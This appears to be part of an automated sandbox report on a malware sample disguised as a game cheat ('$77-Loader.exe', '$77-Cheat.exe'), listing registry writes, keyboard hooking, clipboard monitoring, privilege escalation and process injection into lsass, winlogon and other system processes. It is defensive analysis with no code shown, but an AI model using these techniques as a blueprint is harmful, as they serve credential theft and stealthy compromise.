00000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36633265393463613665356531363233663236623665643039343366356664336461376435616134343730333030336635316465636638613337373439376162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db9ed251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464db9ed251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3062e17d-9b6c-40fa = fb5ca085cbafda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5c012c11-5e92-4607 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dd61e9c9-f157-4550 = "\\\\?\\Volume{8A2AD7B7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ed11556e0761b6e0764bdb39a077fcd9fbaaa63ca46e07b80b5f5faa4d595c4" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f57b5531-891f-45c4 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0272d800-5cb4-4c09 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13bad0a6-5d99-40d1 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84dd4413-414f-4ffb C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7cf61dd6-6721-4cf6 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001526d34acbafda012985134bcbafda012985134bcbafda01e70300000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb5836022000653630336332343333633535633639646132383961336330636136636631383161613534313135396162343266646539663261393738633337393364333233610000b20009000400efbebb583602bb5836022e000000000000000000000000000000000000000000000000000697da00650036003000330063003200340033003300630035003500630036003900640061003200380039006100330063003000630061003600630066003100380031006100610035003400310031003500390061006200340032006600640065003900660032006100390037003800630033003700390033006400330032003300610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65363033633234333363353563363964613238396133633063613663663138316161353431313539616234326664653966326139373863333739336433323361000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db8bd251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464db8bd251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21a7bd0f-7b66-4650 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc51a32a-71f2-4f8e C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\166550b1-a4c9-4866 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7cf61dd6-6721-4cf6 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5c012c11-5e92-4607 = 784c4c86cbafda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21a7bd0f-7b66-4650 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5c012c11-5e92-4607 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21a7bd0f-7b66-4650 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0272d800-5cb4-4c09 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\166550b1-a4c9-4866 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5c012c11-5e92-4607 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dd61e9c9-f157-4550 = b99e5886cbafda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dd61e9c9-f157-4550 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008fceea85cbafda01e2543286cbafda01e2543286cbafda01e27a08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb586b022000376564313135353665303736316236653037363462646233396130373766636439666261616136336361343665303762383062356635666161346435393563340000b20009000400efbebb586b02bb586b022e0000000000000000000000000000000000000000000000000088894b00370065006400310031003500350036006500300037003600310062003600650030003700360034006200640062003300390061003000370037006600630064003900660062006100610061003600330063006100340036006500300037006200380030006200350066003500660061006100340064003500390035006300340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37656431313535366530373631623665303736346264623339613037376663643966626161613633636134366530376238306235663566616134643539356334000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464dba3d251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464dba3d251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84dd4413-414f-4ffb = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7cf61dd6-6721-4cf6 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13bad0a6-5d99-40d1 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3062e17d-9b6c-40fa = "\\\\?\\Volume{8A2AD7B7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58ef1de56d2dca62a430c4bb683322e09825d22a9d93a4282c21e7ca9807eedc" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84dd4413-414f-4ffb = 7ddba04acbafda01 C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\$77-Cheat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\$77-Cheat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\$77-Cheat.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1384 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\$77-Cheat.exe
PID 1384 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\$77-Cheat.exe
PID 1384 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 1384 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 1384 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 1800 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1800 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1800 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1800 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1800 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1800 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1800 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1800 wrote to memory of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4172 wrote to memory of 612 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 4172 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 4172 wrote to memory of 952 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 60 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 4172 wrote to memory of 740 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
